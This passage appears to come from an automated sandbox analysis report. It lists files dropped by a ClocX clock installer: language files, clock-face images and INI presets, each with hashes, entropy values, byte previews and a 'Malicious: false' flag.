SHA1:	2E58FAAB3B35F2C36F391E677932722949B66F8D
SHA-256:	3A5F18B977B2D40B832E362D5E3DB7B5A10EAF7DDBA793B830B60CA02FC7A9B4
SHA-512:	E0B456AD42EA6C5C04ACA3ED47EE6EFCD696E7DD46F8E68B425D34CA1228EBD20747D1AF932651CFE6506D17D95D277571156689163E82D5AE7D4BA590DD5A49
Malicious:	false
Preview:	001,Kan inte h.mta bilden..002,Kan inte starta timern!..003,Allm.nt..004,Utseende..005,&Aktiverad..006,Fel vid till.gg av alfakanal!..007,Kan inte ladda timvisaren!..008,Kan inte ladda minutvisaren!..009,Kan inte ladda sekundvisaren!..010,FM..011,EM..012,ClocX - larm ST.NGER..013,Kan inte h.mta bakgrunden!..014, Genomskinlighet (Win2k/XP) ..015, Prioritet ..016,L.g..017,Normal..018,H.g..019, Kantutj.mning ..020,&Inaktiverad (snabb)..021,Metod &1 (standard)..022,Metod &2 (l.ngsam)..023, Alternativ f.r f.nster ..024,Alltid &.verst..025,&F.st p. Skrivbordet (Win2k/XP)..026,&Klicka genom (Win2k/XP)..027,&Ej flyttbart f.nster..028,&Begr.nsa position till sk.rmen..029, .vrigt ..030,Visa &FM/EM..031,Varje minut..032, Bakgrund ..033, Start ..034,&Starta samtidigt med Windows..035,S&tarta vid login (anv.ndare)..036,&.ndra inte pos. (tv. sk.rmar)..037,Alternativ..038,OK..039,Avbryt..040,&St.ng..041,&Nytt.....042,&Redigera.....043,Ta &bort..044,&Testa..045,Larm sorterade efter tid..046,Namn..047,

C:\Program Files (x86)\ClocX\Lang\Thai.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2386
Entropy (8bit):	6.112058786166187
Encrypted:	false
SSDEEP:	48:Q0QaBfLuSJH+yK99GThN/+5l1VeiOmxzgSCQLQiTpCyB7XgAuP8XTu:Q0QaBfLuSJVK99ChY1V5VbXpCyB7XgTz
MD5:	5A008D847D9846DB2EB9D84B500FC407
SHA1:	F4DBD5725559F1FDE3497959F15F8E2DB01B9A60
SHA-256:	54991D21C1EA6C3C3C54FE68DAEFF96041DF96C4AE05E13B300C8E60A8DA3DE3
SHA-512:	43D253A8C72E444F5EB5430D31EA5ADFC4EF2D309CFB8859713195E8DD34756EEF988DE443CE7C3F429A670F0D8B1011A4B886DEE4D85985EED06B78DBFE0CCD
Malicious:	false
Preview:	001,.................002,.....................!..003,........................!..004,....................!..005,.....................!..006,............................!..007,.....................!..008,.................!..009,..................!..010,AM..011,PM..012,..... X - ...........!..013,.....................!..014, ......... (Win2k/XP) ..015, ....../... ..016,.....017,......018,....019, .......... ..020,............. (......)..021,..... 1 (....)..022,..... 2 (........)..023, .......... ..024,............025,.......... (Win2k/XP)..026,........... (Win2k/XP)..027,.....................028,...............029, ............. ..030,... AM/PM..031,................ PNG .......032, ............ ..033, ............... ..034,...................035,............... (......)..036,...............(.2 ....)..037,.............038,&.....039,&......0

C:\Program Files (x86)\ClocX\Lang\Traditional_Chinese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1902
Entropy (8bit):	6.37456130870283
Encrypted:	false
SSDEEP:	48:u8hbLlIx/SDsjUqJPgocfhc65yk8mGaEQNcbqCgjkpRqM4LkXNfua2SiuPCnXTu:u8llIx/SQ4qJPWfhc65yJAElwkAkdH6y
MD5:	1087C3F3DDD9CC72492C6CE37579D069
SHA1:	3E715A01456D0421D6C407538A69E670CC18A512
SHA-256:	0AB5DF5226313D018060B308AF3DB6C5C9CACF7A1985607C3542380268076F56
SHA-512:	34E928146D5B26E9C2F532392DB15BACCE94AB9A36C93C3D398199E667474E3571938CCF425363D35E19C2F9E928C159A5792B10392122423C699FB5FE26F8AD
Malicious:	false
Preview:	001,.L.k...J.....002,.L.k..l..p...!..003,.@....004,.~.[..005,.....006,...~.[.J alpha .W.D!..007,.L.k...J..w!..008,.L.k...J...w!..009,.L.k...J..w!..010,AM ..011,PM ..012,ClocX - ........!..013,.L.k...J.I..!..014, .z.. (Win2k/XP) ..015, .u.... ..016,.C..017,.@....018,....019, ..O.W/..... ..020,.w.... (..)..021,..k 1 (.w.]..)..022,..k 2 (.C)..023, ....(....).. ..024,......W.h.....025,.....T.u.. (Win2k/XP)..026,.........k.... (Win2k/XP)..027,...i..........028,.......i...X.....029, ....].w.. ..030,...W..(AM)/.U..(PM)..031,.C....032, .I.. ..033, ... ..034,.H Window .}........035,.H.n.J (...) ......036,...n...]......m..037,....038,.T.w(&O)..039,....(&C)..040,....(&C)..041,.s.W(&N).....042,.s..(&E).....043,.R..(&D)..044,....(&T)..045,............046,.W....047,.....048,.....049,.... %d ....050,.C....051,.C.g..052,.C....053,.C.~..054,.@....055,.....s....056,.W..:..057,..{:..058,...: ..059, ..@: ..060,............061,.....y.z:..062,.... WAV ...

C:\Program Files (x86)\ClocX\Lang\Turkce.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2241
Entropy (8bit):	5.3993674147697766
Encrypted:	false
SSDEEP:	48:vfuHDUxQ2FPl6UoFzHioqkIqKpyLm50pN+b2DFFakIss2q8WeHSwTu:vfSgxQ2FtxAzfIpyLHN+qPm2C6Tu
MD5:	AF5BF71BF65C85430F339FD263D19E60
SHA1:	5004E292E76559C176A0A2BDA06FDD75AA0788EC
SHA-256:	4298489EA4E99BB8CF68C0051312D10424E17026A82A868F9FBE16014244100D
SHA-512:	63B811EE7A5EB2E3EA667AFB23823EED3FF798F3168571215644029EA3A942935091778C20E56D55BAFF3C2A5D3A285F6B2A2ECD5385C784A0622A85E199A103
Malicious:	false
Preview:	001,Resim a..lamad...002,Zamanlay.c. ..z.mlenemedi!..003,Genel..004,G.r.n.m..005,&Etkin..006,Alfa kanal. eklenirken hata!..007,Akrep i.areti a..lamad.!..008,Yelkovan i.areti a..lamad.!..009,Saniye i.areti a..lamad.!..010,AM..011,PM..012,ClocX - alarm KAPAT!..013,Arkaplan a..lamad.!..014, &Transparanl.k (Win2k/XP)..015, &.ncelik..016,D...k..017,Normal..018,Y.ksek..019, Antialiasing ..020,Etkisiz b.rak (&h.zl.)..021,Methot &1 (varsay.lan)..022,Methot &2..023, Pencere se.enekleri..024,&Daima .stte..025,&Masa.st.ne ..nele (Win2k/XP)..026,D&o.rudan T.kla (Win2k/XP)..027,O&ynat.lamaz pencere..028,&Pozisyonu ekrandan k.s.tla..029, Haz.rl.k se.enekleri..030,&AM/PM G.ster..031,Dakikal.k..032, A&rkaplan..033, Ba.lang....034,&Windows ile Ba.lat..035,Ot&urum ile Ba.lat (kullan.c.)..036,Po&zisyonu ayarlama. (dual-monit.r)..037,Se.enekler..038,&Tamam..039,.pta&l..040,&Kapat..041,Ye&ni.....042,D.z&enle.....043,&Sil..044,&Test Et..045,Zamana g.re alarmlar..046,.sim..047,S.re..048,Tarih..049,%d. ayda g

C:\Program Files (x86)\ClocX\Lang\Ukrainian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2325
Entropy (8bit):	5.813118990170243
Encrypted:	false
SSDEEP:	48:1liKJBTGlVWryPQ42xZZW8KVIFND5i394wtoPlnjp3uPAPxM:1liKnTGlVSyIzZW8KVIFtwZoq4m
MD5:	D10E2A8BCCCAF9EFF46D453E6FB127D0
SHA1:	7C7A5C843C6B8FB615CBF30DE329A1505276450C
SHA-256:	7608128E882E3A34CFC48A35DA9C2F1C77BD07B491EE4BD1D6D48BB425CB68BD
SHA-512:	E600F8345D0F17D920C01EC47EFA6AA76F1608834AC4390D0F489A24B59EDF94B7707AAA51EB9FD0D462483C465A44187EA72AFBF99747F13262862FCA0FE0BD
Malicious:	false
Preview:	001,.......... .. .............!.002,.. ........... ......... ....!.003,.......004,..........005,..........006,....... ......... .....-......!.007,.. ............. ....... ......!.008,.. ............. ........ ......!.009,.. ............. ........ ......!.010,...011,...012,ClocX - ...... ......... ....'.....!.013,.. ...... ....... .......!.014, ......... (Win2k/XP).015, ..........016,........017,...........018,........019,...........020,............ (.......).021,..... 1 (...........).022,..... 2 (........).023, .... - ...........024,... .... .......025,........ .. ...... (Win2k/XP).026,........ ... ........ (Win2k/XP).027,........ .....028,........ ...... .......029, ......... ...........030,.......... ../...031,Minutely.032, ....... ........033, ..........034,...... ..... . Windows.035,...... ... ... ............036,.. ........... .....037,..........038,&...!.039,&.......!.040,&.....!.041,&.........042,&..........043,&.........044,&.........045,........

C:\Program Files (x86)\ClocX\Presets\AJ-CityHall-500-hour.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 181 x 27, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1350
Entropy (8bit):	6.69981675807187
Encrypted:	false
SSDEEP:	24:m6y1htZdWwjx82lY2T3pHEVbuYYiyJ3Vbq4G6SA9dGogWH+192AotNLFFg2u:twqNn2SATJ3X3feH2JF6
MD5:	CDBC4ABB27F64B3E4073D798D205B5B7
SHA1:	58577123B1D59FCCFB80A588D92C11F447258A23
SHA-256:	5821718C8E53A8ACD10DD52C12E451E88F3DD7CE94332E6406490DF2459823D3
SHA-512:	B6B3F5F8120DEDBC27A39DE98E5F6CFDEA6C2B11C6E5C2E960A4C16E37C8D752D4F0103D494E03FB5C2C7FA9C4BBDDD16B51D0CB8B87602FC83C5519BE98D3F5
Malicious:	false
Preview:	.PNG........IHDR...............>.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:D3C59E439F2011E18651C5CDA301D5A0" xmpMM:DocumentID="xmp.did:D3C59E449F2011E18651C5CDA301D5A0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D3C59E419F2011E18651C5CDA301D5A0" stRef:documentID="xmp.did:D3C59E429F2011E18651C5CDA301D5A0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..F.....PLTE...333fff...{{{......BBBHHH.......................???TTT'''NNN```............xxxuuuccc..............---...

C:\Program Files (x86)\ClocX\Presets\AJ-CityHall-500-minute.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 230 x 5, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1115
Entropy (8bit):	6.213566468733229
Encrypted:	false
SSDEEP:	24:uLy1htZdWwjx82lY2T3pHEVqSacyJ3VcHJqlGZE+JMGzl0s2snMj:mwqNn2S8JPJ3K4l+J0dj
MD5:	8619F256A096C9E1AD177F97B799D82D
SHA1:	9EEDCB61BB671006830D76A89969CE962C4F6813
SHA-256:	6B4041B6DFD71C01E16016D5CC98A950951A1B44A3FA0CE48A7668BD4A229853
SHA-512:	2B954763605B7F082963EBCDD3213F30E0DECA1C5E3B06B720142887A18CA6FB8BCF4D429C05432F45529E33F062E10E69F39855FD9E109BBF949F79080FD813
Malicious:	false
Preview:	.PNG........IHDR.............fd`.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:2EB4C5F39F2211E18513A81FC2AFE6F4" xmpMM:DocumentID="xmp.did:2EB4C5F49F2211E18513A81FC2AFE6F4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2EB4C5F19F2211E18513A81FC2AFE6F4" stRef:documentID="xmp.did:2EB4C5F29F2211E18513A81FC2AFE6F4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Ti]...TPLTE......?>>NNN......!!!tss(''......DCC.........=<<............]\\...&%%...100............c....tRNS............

C:\Program Files (x86)\ClocX\Presets\Adler.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	55630
Entropy (8bit):	7.986980389473075
Encrypted:	false
SSDEEP:	768:AvEl7OYQJBlmbnzl7WWsHp8Oi4rdq3mQYomnVb6kanEpHVjaBqUXz:xYmbzoWACO1rd7QYoeWERsz
MD5:	0429009042C10C55BAA8A1399E50439A
SHA1:	3E1290EDE1D59D407747B2549E5E377CE1EBEF2D
SHA-256:	B7CD2C45291C1912745BFBAB53D09DEB7807F5D7343BDD258A44D47B9B1BC9D8
SHA-512:	B94907B7966E2BD14FD3C918ABB8BE692007836942FB4A59882419B7F6E4FDCED1EBC012CCD3A2BA3986AA395F59251A4E094E980AAE22CD546ABA25C300F5C0
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs...:...:.d.W.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx...n.a........6..../.E..4.4.ua..iI.5.V.N.b.P.j........,B..a...O...&.....l.{.:m...nc7.......N..\|..A...`8.g.H..C...+V.......Ym089%oI...6.......Q,9...no@...L..d2a..Tj..7Hiy\..0+D.q.#..v.]&....d...=.NxS......W...ta....%1.pI<.Y......LH<.{'..V...../.7..h$soG5o.+.S.F.f. .6Z......6.]A..Q..M.q...x}..X..#g...s....F<...........#S1..S...=M..s w...G.vj.r.D2...(.6bd.%./..2.........a('.}G.0.x...........p.....m..p..IsW.Uu.K.=..\v7$..Op......~y...J.......(...V..Q!....k~e$7=.(.t..z.....{.O_.v..]....;..`..u.....v.:0..3.^5...@...p....]...n.{\i....Vm).0.U^q.....W........;.g.w...9.]<r...g.......!...#..G...........?2...h`.._...u.c...GG........R.?2..{Aa......L..b...k..........\.;$..@.....\|.N......o...`.x..u..N...}.s..on.......M..w........[.G.........6..^........W/._U...S....]..wuo.....S...M-k.tM...%.........;..fz......a!E..\|...............

C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	946
Entropy (8bit):	4.661831809454109
Encrypted:	false
SSDEEP:	12:a4EqmYrrrcRQBjpJrprh27XFPV+J/PnXFPVG99XFPUXFqC2kpmdoH9Gs968v2ims:BEQrmu95UTOxf01kKkp5dG/8+i4352X
MD5:	1ED534D32D9C5AEC051584FD4F4A6AC0
SHA1:	69FFD3F42B20EA7F0D8ACF48A914265A2B03ED59
SHA-256:	F247ED947B0F833783B876902185821E47283039ABA7114F114EDD889CF04F45
SHA-512:	996F90AD4E516474F1632164164410BDC791A994664A6DD227AEFDBAE9556B6E86A48720F9C52BA6C1FBB896DE958F114A35ED9E6FAAB10724B971D9C6A47F85
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red)..DisableAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0x787878.;color of AM/PM indicator....HourColor=0x1F4CA2 ;color of hour hand..HourLength=15 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=2 ;width of hour hand....MinuteColor=0x1FFAA2 ;color of minute hand..MinuteLength=30 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=1 ;width of minute hand....SecondColor=0xF7FA92 ;color of second hand..SecondLength=30 ;length of second hand..SecondLap=10 ;overlap of second hand..SecondWidth=0.7 ;width of second hand....;CenterX=68 ;center point's X (default image_width / 2)..;CenterY=66 ;center point's Y (default image_height / 2)

C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 140 x 165, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	45581
Entropy (8bit):	7.983167078747716
Encrypted:	false
SSDEEP:	768:TnOKv1UzMqfrTun4WXmRdkWKGoHfX7Yik3gAv2zMpr6VPtJHj2M4hmH4G:TnOKNyMqfrXjkWKGoHfX7YiInhpr6VrJ
MD5:	C09624E5A94C36866D9BF05A3C07DD33
SHA1:	A98ACA5BA10EA2187BF11CC506BE2FA893AEAA79
SHA-256:	7E59083736758B2575545383BB8ED07EF79972D4ED3AB08F78B367528FAEB596
SHA-512:	00F2F02EDCD6A5BCFD9037378A58F2BA3D47CBD010A3EAB9B9A62E46535DCCD744888BBB6FF7C48FCF5EB02CAEF0634DEAA2129CE496E5CF64EE79CF0E56CF9B
Malicious:	false
Preview:	.PNG........IHDR..............c......pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.(......b...Q@......3.H...4.`F.I. .F..( .....H.........?....13..............32p}\.>..hR....b.).....l..~...k.LffF....33........gf...?.......$...0..../..........g.+!V...&.t........h.'.....O..7...........0..a`eab...d...d...'.o?.~...N,....,.L.LLL...^3....L....11\|......_.........KT..g...#%....^n...(.>...C.DSt..[.4@.,..=...AB(...9..6R.=....+O.hrM}.....6.........H.>.x.". p..>.I..../H.j.....`.(..d..K.........e..[.P.........K0.....}.....O..>v.Q>Qp......._...T....0pss3.e.....o..?...........O.\,l.....SP.........._`........l\....@U......g/..}.yVD..v.....5....H0i...~....`.L{.../>v{.....o>1\.v........O..Px.../........._.o..0.s.K.`...?.........P..?0..b..,....\|Ap..../...o....LGG...o ....\?..rp..2sp..."..pJ0...1w...(.^.\|p...$j.....].{0..-X..?D2:8q.H....\|..'....Y.w.....!C:...^8_.X.`.....&(..4.. 9.Aq4.#..lU...7Y%.%....V1.....C4. ..s..h4@:I...K....y..\|

C:\Program Files (x86)\ClocX\Presets\Amarillo.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24329
Entropy (8bit):	7.9041850094582715
Encrypted:	false
SSDEEP:	384:Pj/Jv0KxBi7S2563Y7bY45Bi3cmrt05iuxtrjFrF27F0JP6BSyk:P7JVx+7cYHH5M3cS053LrjFrswPxyk
MD5:	0BC808A35C32957F3C115DE1593263AF
SHA1:	639DFF4394E4739E48B8647E24BF5CA055975482
SHA-256:	4807722EB149030D3BE8DF0D51FE0B0232CA618360D7982F637F9560A00488E2
SHA-512:	158642B2FAEBF5901781BDF56A2BE7E7E21225CC48A6AC0CEFA5A463B95466792868843A96BB975A9E0076225FA150BE66B0DDC25ED88C60BDC76B2F18E9A32A
Malicious:	false
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..^.IDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....e4.....L..........X...A.H...(...1?.s.1'..B.....@...?..{ ~....3<..O.......@.nE....M... .....Ag..>...&R. ....@......%..... ....../.W..8....@..&`....L..@.......(...H.....T.D....@\|..;.L..Gc....h.'..N&Pb..b; ..&<.\....E/...?.D..H...C@\|.........4".00.... .L.....5m2./Uq'bF...X.../.......Y.A...o.....@~.. ..Q.1.Hi._.q.u..%^..5J.(....qA.../.yy..6....7....m....E.@$.D..t.c6...Z....$S(..../..#.......U.;)a..Ms!g...........aX....}.WA.....%..u........"]Z....H<.x ..j0H....?w...~...0............CmJ.Y&.t..h.Y..}.)K..sG...O....~......A.....ms.1#.:....%7.....]O....{..a....W...B.i1..uBO.(%,....&FfV`".a....ca ..&XP........f.6..C.......o`...L......o.^.&.G.....'...XJh....Y...&.7.1...h.%``...&.H`:..r.1.-..L..,...UEE...

C:\Program Files (x86)\ClocX\Presets\Apple.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	21840
Entropy (8bit):	7.867040497269375
Encrypted:	false
SSDEEP:	384:5tGsRrRU7jBNZv2+ytf2IbDeKuY2PDuRuxm6Cilnov4fsxqZlQ:ukRANuHlzHVa0i9R7sxz
MD5:	17A826CF3E44BE13DC3D3077BCE71456
SHA1:	2B4067840DB9403BC4DFF49DD0B4CBC686830003
SHA-256:	3E693BCD12D1BEEEAE1A419286539DADCBAAA970DC39EC0E4C928431B89684F0
SHA-512:	423DA5BE9D159473FEB5A3D5718E5DCF45BEF5800CCA64C4D9A37C852A0BECE919209B328F75DAEDAD6D850B8B79A90C72D6086F92349423670C9B5CAA793679
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..T.IDATx..MJ.P....4I....UZEg...At..=8r.b.....33.:Q..(..Om^...t....f....\.h....:..w4...:TrF..).O....6...%...N....H...#.^@..FX....l......j.5.U....9.... ..9}@.6.EU..z...O.oX.......w.Q.........Z.......".....'.<.........5...K=_.$z....'.~.!.X.F.)..N.@,...oWn1..Na%;&..CN.....e.A...../.....g.~.}...........h4........d...V.A.`.s....bdbf...7.....RL..........._.??>...j..L...4.....~p...C@6.....K....,...@..Hg........=.(.0232p..\|.A........... .F...R.._u.!..6..D..y9`,.c... ...Z./0.r>.+....3..3..........l.0..... .F.....g..-Z./c.....l...7L..,P6.B`D3pq03..1..01\|......?......M..F._.HI0..@..&.....].......Ll..H...GPq..............AR..A.....?..>.c.....??>.....7P.;....M.......h4..E>.;.)..../5...K.\........,...T...NV..1!v.).....vp...;0n...~...............lP.a.`P%....&...=.....7....=..^3.....................g..be...b.....\|6p.................><y.t..R..o0....hX$.FFfh&....K.....

C:\Program Files (x86)\ClocX\Presets\Aqua.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 116 x 117 x 24, resolution 2834 x 2834 px/m, cbSize 40772, bits offset 54
Category:	dropped
Size (bytes):	40772
Entropy (8bit):	4.180879268207736
Encrypted:	false
SSDEEP:	96:TWMaS6iyEE7D4blhUraVHX/6bLtqUtC8D5zd8R2YuIHwD555D51vyRI/Bke9HAmx:TWuVy+mVWIZWYKmJ
MD5:	F80744C019A522AF5A4BDB6B9D99229D
SHA1:	FD7067AB7257FB030B05DFDECE58C7CF532160B6
SHA-256:	BE88E238CD1428C247D1D9E8504746D07A564C75D0F82173A4BBC38BF64C5E14
SHA-512:	EECD1A42F5E97F4D4EA045A64B1176AEF91B9BFE7F57D4DE19EBCBECD50B5EA4E269C62F1C82AAE155573F1676314A0366EF512687CFCEA805B18DDACF831A40
Malicious:	false
Preview:	BMD.......6...(...t...u....................................................................z`.X7.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.H%.F".S2.pT.............................................................oS.C..f@..b..........................................................................................................................................................................................j.nG.J%.fH...........................................N(..[.......................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\Aqua.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	30483
Entropy (8bit):	7.932354142916476
Encrypted:	false
SSDEEP:	768:3fQkIoTw9vw5VugTvrBRCKbhNE3uJJD1GYP71q:vQ6CIVuGTvhbLE3iYqq
MD5:	73E7B2F60F8AC6FDE449861AC5484755
SHA1:	FF314467B04E04A70C2BCAF2C5E65C1C7B5D9274
SHA-256:	81DC5E6439F08EDEA70408774E1195FB2D01BE1AAE88B0A157EB7E8BC342DDA3
SHA-512:	EA9A4C1A3F9897AC96D3A3111F6F1D5BBC32EDAE25B4D69FD47144E5FE5970823C3FCF81D45EBB950BDFFB16CFA5CE0963F220F08BBF942A0BCFCAA025A0CA64
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..v.IDATx.b...?.(... ..........D...=............bddd...@..H3A.....@....3......3..33...^.bX.l..'..b......b....faaQ.F...........-...$.L..@6.01p...131..P...?...H~..O@......_.....m`.x.....-{....a.n..4$K.>>>..N.&6v6...Fs^^^.A.Ac`...#......._..}.{.......3032C. aF&.&&Fxb.a.9...........(....>^.~......~...LIi.._.~.......>......!..,-,A.....n.......3`...9.........A.....e...?,..fb.E0...'.&pB......D...........33.L`"....\|...;{z.zO..w..80d.. ..D........uvr........:0..A....,...H.. 1P....:(.Ab....rPdB.A...L.H.I.0........@9P....4(..@h`"..L.7.....n^.z..;w..". ..m....g...Vt.s........3....?...#......e.../.? ......g.dm..?...~.K.?..@."%.P...y......XYY..X..........889.lH..1.?.f..eaa.'$.~X).2C@@......\|.r..]...\....;w.e8..`..q...(.. 1...p..I<........Vx.m,..f.a....p...j.1....8.......D..4.-.......a......\|.....0..Z.c..W...J5t}.....[..N....0........Y.!^.H..I...@.A.....A8

C:\Program Files (x86)\ClocX\Presets\AquaB.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	962
Entropy (8bit):	4.5949957780877515
Encrypted:	false
SSDEEP:	24:BEIrIA83TORXFB01rfjkpWdGm8xiF0ZJGi:BzucFKuMdGmEZJp
MD5:	1A89EDBFD22BA1D75DD1B647D14ACF19
SHA1:	E2B42F0A5751BE735F9F1C253B1054DC0A21818B
SHA-256:	69E4CBA68588981E07949CF2B90D506F7139E5DDEB0922D84ABFECB6ADA8D666
SHA-512:	CCB1472901B66F0F7E24F57F1ACE692972421871B2B039202948126A2F007155CCDB7424B9FC1E80017870F1524ECDA1AE6E452E9678413B9CF8101ACE0D6F9E
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFFFFF ;cut window by this color (default red)..ShowAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0x00000000.;color of AM/PM indicator..DateColor=0....HourColor=0x00000000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x00000000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x000000FF ;color of second hand..SecondLength=55 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=63 ;center point's X (default image_width / 2)..CenterY=61 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\AquaB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	30483
Entropy (8bit):	7.932354142916476
Encrypted:	false
SSDEEP:	768:3fQkIoTw9vw5VugTvrBRCKbhNE3uJJD1GYP71q:vQ6CIVuGTvhbLE3iYqq
MD5:	73E7B2F60F8AC6FDE449861AC5484755
SHA1:	FF314467B04E04A70C2BCAF2C5E65C1C7B5D9274
SHA-256:	81DC5E6439F08EDEA70408774E1195FB2D01BE1AAE88B0A157EB7E8BC342DDA3
SHA-512:	EA9A4C1A3F9897AC96D3A3111F6F1D5BBC32EDAE25B4D69FD47144E5FE5970823C3FCF81D45EBB950BDFFB16CFA5CE0963F220F08BBF942A0BCFCAA025A0CA64
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..v.IDATx.b...?.(... ..........D...=............bddd...@..H3A.....@....3......3..33...^.bX.l..'..b......b....faaQ.F...........-...$.L..@6.01p...131..P...?...H~..O@......_.....m`.x.....-{....a.n..4$K.>>>..N.&6v6...Fs^^^.A.Ac`...#......._..}.{.......3032C. aF&.&&Fxb.a.9...........(....>^.~......~...LIi.._.~.......>......!..,-,A.....n.......3`...9.........A.....e...?,..fb.E0...'.&pB......D...........33.L`"....\|...;{z.zO..w..80d.. ..D........uvr........:0..A....,...H.. 1P....:(.Ab....rPdB.A...L.H.I.0........@9P....4(..@h`"..L.7.....n^.z..;w..". ..m....g...Vt.s........3....?...#......e.../.? ......g.dm..?...~.K.?..@."%.P...y......XYY..X..........889.lH..1.?.f..eaa.'$.~X).2C@@......\|.r..]...\....;w.e8..`..q...(.. 1...p..I<........Vx.m,..f.a....p...j.1....8.......D..4.-.......a......\|.....0..Z.c..W...J5t}.....[..N....0........Y.!^.H..I...@.A.....A8

